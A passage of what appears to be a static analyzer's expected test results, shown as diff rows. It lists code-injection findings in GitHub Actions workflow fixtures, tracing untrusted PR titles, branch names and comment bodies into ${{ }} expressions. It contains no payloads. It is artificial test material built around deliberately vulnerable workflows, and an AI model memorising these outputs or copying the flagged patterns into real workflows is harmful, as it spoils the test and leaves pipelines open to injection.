.github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | .github/workflows/pull_request_review_comment.yml | +| .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | .github/workflows/pull_request_review_comment.yml | +| .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | .github/workflows/pull_request_review_comment.yml | +| .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/pull_request_review_comment.yml:1:5:1:31 | pull_request_review_comment | .github/workflows/pull_request_review_comment.yml | +| .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | .github/workflows/pull_request_target.yml | +| .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | .github/workflows/pull_request_target.yml | +| .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | .github/workflows/pull_request_target.yml | +| .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | .github/workflows/pull_request_target.yml | +| .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | .github/workflows/pull_request_target.yml | +| .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | .github/workflows/pull_request_target.yml | +| .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | .github/workflows/pull_request_target.yml | +| .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | ${{ github.head_ref }} | .github/workflows/pull_request_target.yml:1:5:1:23 | pull_request_target | .github/workflows/pull_request_target.yml | +| .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | .github/workflows/reusable-workflow-caller-2.yml:10:15:10:52 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | ${{ inputs.taint }} | .github/workflows/reusable-workflow-caller-2.yml:4:3:4:21 | pull_request_target | .github/workflows/reusable-workflow-caller-2.yml | +| .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | .github/workflows/reusable-workflow-2.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | ${{ env.log }} | .github/workflows/reusable-workflow-caller-2.yml:4:3:4:21 | pull_request_target | .github/workflows/reusable-workflow-caller-2.yml | +| .github/workflows/reusable-workflow-2.yml:66:34:66:52 | env.prev_log | .github/workflows/reusable-workflow-2.yml:45:24:45:61 | github.event.changes.title.from | .github/workflows/reusable-workflow-2.yml:66:34:66:52 | env.prev_log | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/reusable-workflow-2.yml:66:34:66:52 | env.prev_log | ${{ env.prev_log }} | .github/workflows/reusable-workflow-caller-2.yml:4:3:4:21 | pull_request_target | .github/workflows/reusable-workflow-caller-2.yml | +| .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | .github/workflows/self_needs.yml:16:20:16:57 | github.event['comment']['body'] | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | ${{ steps.source.outputs.value }} | .github/workflows/self_needs.yml:4:3:4:15 | issue_comment | .github/workflows/self_needs.yml | +| .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | .github/workflows/self_needs.yml:16:20:16:57 | github.event['comment']['body'] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | ${{ needs.test1.outputs.job_output }} | .github/workflows/self_needs.yml:4:3:4:15 | issue_comment | .github/workflows/self_needs.yml | +| .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | ${{ steps.step.outputs.value }} | .github/workflows/simple2.yml:3:6:3:24 | pull_request_target | .github/workflows/simple2.yml | +| .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/simple3.yml:2:3:2:14 | workflow_run | .github/workflows/simple3.yml | +| .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | ${{ toJSON(github.event) }} | .github/workflows/simple3.yml:2:3:2:14 | workflow_run | .github/workflows/simple3.yml | +| .github/workflows/slash_command2.yml:20:21:20:66 | steps.command.outputs.command-arguments | .github/workflows/slash_command2.yml:11:9:20:6 | Uses Step: command | .github/workflows/slash_command2.yml:20:21:20:66 | steps.command.outputs.command-arguments | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/slash_command2.yml:20:21:20:66 | steps.command.outputs.command-arguments | ${{ steps.command.outputs.command-arguments }} | .github/workflows/slash_command2.yml:2:5:2:17 | issue_comment | .github/workflows/slash_command2.yml | +| .github/workflows/test1.yml:27:20:27:39 | env.ISSUE_KEY | .github/workflows/test1.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test1.yml:27:20:27:39 | env.ISSUE_KEY | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test1.yml:27:20:27:39 | env.ISSUE_KEY | ${{ env.ISSUE_KEY }} | .github/workflows/test1.yml:4:3:4:21 | pull_request_target | .github/workflows/test1.yml | +| .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | .github/workflows/test2.yml:17:9:25:6 | Uses Step: changed | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | ${{ steps.changed.outputs.locale_files }} | .github/workflows/test2.yml:4:3:4:21 | pull_request_target | .github/workflows/test2.yml | +| .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | .github/workflows/test2.yml:29:9:37:6 | Uses Step: changed2 | .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | ${{ steps.changed2.outputs.locale_files }} | .github/workflows/test2.yml:4:3:4:21 | pull_request_target | .github/workflows/test2.yml | +| .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | .github/workflows/test3.yml:13:9:21:2 | Uses Step: issue_body_parser_request | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | ${{ needs.parse-issue.outputs.payload }} | .github/workflows/test3.yml:4:3:4:15 | issue_comment | .github/workflows/test3.yml | +| .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | ${{ toJSON(github.event.comment) }} | .github/workflows/test4.yml:3:3:3:15 | issue_comment | .github/workflows/test4.yml | +| .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | ${{ toJSON(github.event.issue) }} | .github/workflows/test4.yml:3:3:3:15 | issue_comment | .github/workflows/test4.yml | +| .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | ${{ toJSON(github.event) }} | .github/workflows/test4.yml:3:3:3:15 | issue_comment | .github/workflows/test4.yml | +| .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | ${{ toJSON(github.event.comment.body).foo }} | .github/workflows/test5.yml:3:3:3:15 | issue_comment | .github/workflows/test5.yml | +| .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | .github/workflows/test7.yml:9:9:13:6 | Uses Step: comment-branch | .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | ${{ steps.comment-branch.outputs.head_ref }} | .github/workflows/test7.yml:2:5:2:17 | issue_comment | .github/workflows/test7.yml | +| .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | .github/workflows/test7.yml:13:9:17:6 | Uses Step: refs | .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | ${{ steps.refs.outputs.head_ref }} | .github/workflows/test7.yml:2:5:2:17 | issue_comment | .github/workflows/test7.yml | +| .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | .github/workflows/test8.yml:3:3:3:21 | pull_request_target | .github/workflows/test8.yml | +| .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | .github/workflows/test8.yml:3:3:3:21 | pull_request_target | .github/workflows/test8.yml | +| .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | ${{ steps.issue_body_parser_request.outputs.payload }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | .github/workflows/test9.yml | +| .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | ${{ needs.parse-issue.outputs.payload }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | .github/workflows/test9.yml | +| .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | ${{ fromJson(needs.parse-issue.outputs.payload) }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | .github/workflows/test9.yml | +| .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | ${{ fromJson(needs.parse-issue.outputs.payload).version }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | .github/workflows/test9.yml | +| .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | ${{ fromJson(needs.parse-issue.outputs.payload).version }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | .github/workflows/test9.yml | +| .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | ${{ github.event.issue.title }} | .github/workflows/test9.yml:4:3:4:15 | issue_comment | .github/workflows/test9.yml | +| .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | .github/workflows/test11.yml:22:9:30:6 | Uses Step | .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | ${{ needs.get-artifacts.outputs.pr_num }} | .github/workflows/test11.yml:4:3:4:14 | workflow_run | .github/workflows/test11.yml | +| .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test12.yml:10:21:10:67 | github.event.pull_request.title \|\| "foo" | ${{ github.event.pull_request.title \|\| "foo" }} | .github/workflows/test12.yml:4:3:4:21 | pull_request_target | .github/workflows/test12.yml | +| .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test13.yml:10:21:10:57 | github.event.changes.body.from | ${{ github.event.changes.body.from }} | .github/workflows/test13.yml:4:3:4:21 | pull_request_target | .github/workflows/test13.yml | +| .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test13.yml:11:21:11:58 | github.event.changes.title.from | ${{ github.event.changes.title.from }} | .github/workflows/test13.yml:4:3:4:21 | pull_request_target | .github/workflows/test13.yml | +| .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test13.yml:12:21:12:61 | github.event.changes.head.ref.from | ${{ github.event.changes.head.ref.from }} | .github/workflows/test13.yml:4:3:4:21 | pull_request_target | .github/workflows/test13.yml | +| .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test13.yml:13:21:13:55 | toJson(github.event.changes) | ${{ toJson(github.event.changes) }} | .github/workflows/test13.yml:4:3:4:21 | pull_request_target | .github/workflows/test13.yml | +| .github/workflows/test14.yml:16:21:16:60 | steps.changed-files.outputs.files | .github/workflows/test14.yml:14:14:15:117 | echo "files=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_OUTPUT"\n | .github/workflows/test14.yml:16:21:16:60 | steps.changed-files.outputs.files | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test14.yml:16:21:16:60 | steps.changed-files.outputs.files | ${{ steps.changed-files.outputs.files }} | .github/workflows/test14.yml:4:3:4:21 | pull_request_target | .github/workflows/test14.yml | +| .github/workflows/test14.yml:27:21:27:60 | steps.changed-files.outputs.files | .github/workflows/test14.yml:24:14:26:52 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "files=${FILES}" >> "$GITHUB_OUTPUT"\n | .github/workflows/test14.yml:27:21:27:60 | steps.changed-files.outputs.files | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test14.yml:27:21:27:60 | steps.changed-files.outputs.files | ${{ steps.changed-files.outputs.files }} | .github/workflows/test14.yml:4:3:4:21 | pull_request_target | .github/workflows/test14.yml | +| .github/workflows/test14.yml:37:21:37:44 | env.CHANGED-FILES | .github/workflows/test14.yml:35:14:36:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:37:21:37:44 | env.CHANGED-FILES | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test14.yml:37:21:37:44 | env.CHANGED-FILES | ${{ env.CHANGED-FILES }} | .github/workflows/test14.yml:4:3:4:21 | pull_request_target | .github/workflows/test14.yml | +| .github/workflows/test14.yml:48:21:48:44 | env.CHANGED-FILES | .github/workflows/test14.yml:45:14:47:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:48:21:48:44 | env.CHANGED-FILES | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test14.yml:48:21:48:44 | env.CHANGED-FILES | ${{ env.CHANGED-FILES }} | .github/workflows/test14.yml:4:3:4:21 | pull_request_target | .github/workflows/test14.yml | +| .github/workflows/test15.yml:13:21:13:52 | steps.title.outputs.title | .github/workflows/test15.yml:11:14:12:103 | echo "title=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_OUTPUT"\n | .github/workflows/test15.yml:13:21:13:52 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test15.yml:13:21:13:52 | steps.title.outputs.title | ${{ steps.title.outputs.title }} | .github/workflows/test15.yml:4:3:4:21 | pull_request_target | .github/workflows/test15.yml | +| .github/workflows/test15.yml:21:21:21:52 | steps.title.outputs.title | .github/workflows/test15.yml:18:14:20:53 | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "title=$PR_TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test15.yml:21:21:21:52 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test15.yml:21:21:21:52 | steps.title.outputs.title | ${{ steps.title.outputs.title }} | .github/workflows/test15.yml:4:3:4:21 | pull_request_target | .github/workflows/test15.yml | +| .github/workflows/test15.yml:28:21:28:36 | env.TITLE | .github/workflows/test15.yml:26:14:27:100 | echo "TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:28:21:28:36 | env.TITLE | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test15.yml:28:21:28:36 | env.TITLE | ${{ env.TITLE }} | .github/workflows/test15.yml:4:3:4:21 | pull_request_target | .github/workflows/test15.yml | +| .github/workflows/test15.yml:36:21:36:36 | env.TITLE | .github/workflows/test15.yml:33:14:35:50 | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "TITLE=$PR_TITLE" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:36:21:36:36 | env.TITLE | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test15.yml:36:21:36:36 | env.TITLE | ${{ env.TITLE }} | .github/workflows/test15.yml:4:3:4:21 | pull_request_target | .github/workflows/test15.yml | +| .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test16.yml:215:19:230:24 | github.event.workflow_run.head_commit.author.name | ${{ github.event.workflow_run.head_commit.author.name }} | .github/workflows/test16.yml:4:5:4:16 | workflow_run | .github/workflows/test16.yml | +| .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | .github/workflows/test16.yml:125:20:125:75 | echo "value=$(git log -1 --pretty=%s)" >> $GITHUB_OUTPUT | .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | ${{ needs.build-demo.outputs.commit-message }} | .github/workflows/test16.yml:4:5:4:16 | workflow_run | .github/workflows/test16.yml | +| .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | .github/workflows/test16.yml:26:15:33:12 | Uses Step | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | ${{ needs.setup.outputs.ref }} | .github/workflows/test16.yml:4:5:4:16 | workflow_run | .github/workflows/test16.yml | +| .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | .github/workflows/test16.yml:38:15:45:12 | Uses Step | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | ${{ needs.setup.outputs.ref }} | .github/workflows/test16.yml:4:5:4:16 | workflow_run | .github/workflows/test16.yml | +| .github/workflows/test17.yml:25:41:25:72 | steps.get-pr.outputs.data | .github/workflows/test17.yml:14:13:22:10 | Uses Step: get-pr | .github/workflows/test17.yml:25:41:25:72 | steps.get-pr.outputs.data | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test17.yml:25:41:25:72 | steps.get-pr.outputs.data | ${{ steps.get-pr.outputs.data }} | .github/workflows/test17.yml:4:3:4:15 | issue_comment | .github/workflows/test17.yml | +| .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | .github/workflows/test17.yml:30:13:39:10 | Uses Step: get-pr-details | .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | ${{ fromJson(steps.get-pr-details.outputs.data).head.ref }} | .github/workflows/test17.yml:4:3:4:15 | issue_comment | .github/workflows/test17.yml | +| .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | .github/workflows/test17.yml:49:13:55:10 | Uses Step: issues | .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | Potential code injection in $@, which may be controlled by an external user ($@). 
